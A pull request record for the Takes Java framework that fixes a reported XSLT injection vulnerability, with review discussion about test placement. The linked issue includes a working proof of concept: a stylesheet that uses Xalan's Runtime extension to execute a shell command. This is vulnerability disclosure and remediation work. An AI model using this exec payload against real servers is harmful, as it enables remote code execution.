### PR TITLE
fixed #1293 'Takes framework has an XSLT injection vulnerability'

### LINKED ISSUE #1293: Takes framework has an XSLT injection vulnerability.
The Takes framework is vulnerable to XSLT injection due to the lack of secure parameters in XSLT transformation function that comes with the Takes framework.
Below is an example code snippet and its effect.
```
package org.example;

import org.apache.commons.io.IOUtils;
import org.cactoos.Text;
import org.cactoos.io.InputStreamOf;
import org.cactoos.text.Joined;
import org.takes.rs.RsText;
import org.takes.rs.RsXslt;
import javax.xml.transform.stream.StreamSource;
import java.io.IOException;
import java.nio.charset.StandardCharsets;

public class SimpleTakesApp {
    public static void main(String[] args) throws IOException {
            final Text xml = new Joined(
                    " ",
                    "<?xml-stylesheet href='/a.xsl' type='text/xsl'?>",
                    "<page><data>ура</data></page>"
            );
            final Text xsl = new Joined(
                    " ",
                    "<xsl:stylesheet version=\"1.0\" xmlns:xsl=\"http://www.w3.org/1999/XSL/Transform\" xmlns:rt=\"http://xml.apache.org/xalan/java/java.lang.Runtime\" xmlns:ob=\"http://xml.apache.org/xalan/java/java.lang.Object\">\n" +
                            "   <xsl:template match=\"/\">\n" +
                            "     <xsl:variable name=\"rtobject\" select=\"rt:getRuntime()\"/>\n" +
                            "     <xsl:variable name=\"process\" select=\"rt:exec($rtobject,'open -a Calculator')\"/>\n" +
                            "     <xsl:variable name=\"processString\" select=\"ob:toString($process)\"/>\n" +
                            "     <xsl:value-of select=\"$processString\"/>\n" +
                            "   </xsl:template>\n" +
                            " </xsl:stylesheet>"
            );
            String transformedValue = IOUtils.toString(
                    new RsXslt(
                            new RsText(new InputStreamOf(xml)),
                            (href, base) -> new StreamSource(new InputStreamOf(xsl))
                    ).body(),
                    StandardCharsets.UTF_8
            );

            System.out.println(transformedValue);
        }


}
```

WechatIMG1423

### PR DESCRIPTION
**Pull request by PeJetuz**
@yegor256 Please review.
Fix for https://github.com/yegor256/takes/issues/1293
>> Takes framework has an XSLT injection vulnerability

### CODE REVIEW

File: src/test/java/org/takes/rs/RsXsltXxeTest.java [hunk 1]
```diff
@@ -0,0 +1,79 @@
...
+import org.hamcrest.MatcherAssert;
+import org.junit.jupiter.api.Test;
+import org.llorllale.cactoos.matchers.Throws;
+
+/**
+ * Checking XXE vulnerability for XSLT transformer in response class {@link RsXslt}.
+ *
+ * @since 1.24.5
+ */
+final class RsXsltXxeTest {
```
Comment (yegor256) [inline src/test/java/org/takes/rs/RsXsltXxeTest.java:40]: @PeJetuz why making a new class for this test? Why not placing it into the `RsXsltTest`?

Comment (PeJetuz) [reply src/test/java/org/takes/rs/RsXsltXxeTest.java:40]: @yegor256 RsXsltTest class has 225 lines, adding 30 more lines is not very good in my opinion. Move the new test to RsXsltTest, will it be better?

Comment (yegor256) [reply src/test/java/org/takes/rs/RsXsltXxeTest.java:40]: @PeJetuz yes, it's better to keep all test methods that belong to one class - in one `*Test` class, see https://www.yegor256.com/2023/01/19/layout-of-tests.html

Comment (PeJetuz) [reply src/test/java/org/takes/rs/RsXsltXxeTest.java:40]: Thanks a lot, I'll fix it!

Comment (PeJetuz) [reply src/test/java/org/takes/rs/RsXsltXxeTest.java]: @yegor256 I have fixed it, please review

**Comment by yegor256** [comment]
@rultor merge

**Comment by yegor256** [comment]
@PeJetuz thanks a lot!

**Pull request merged**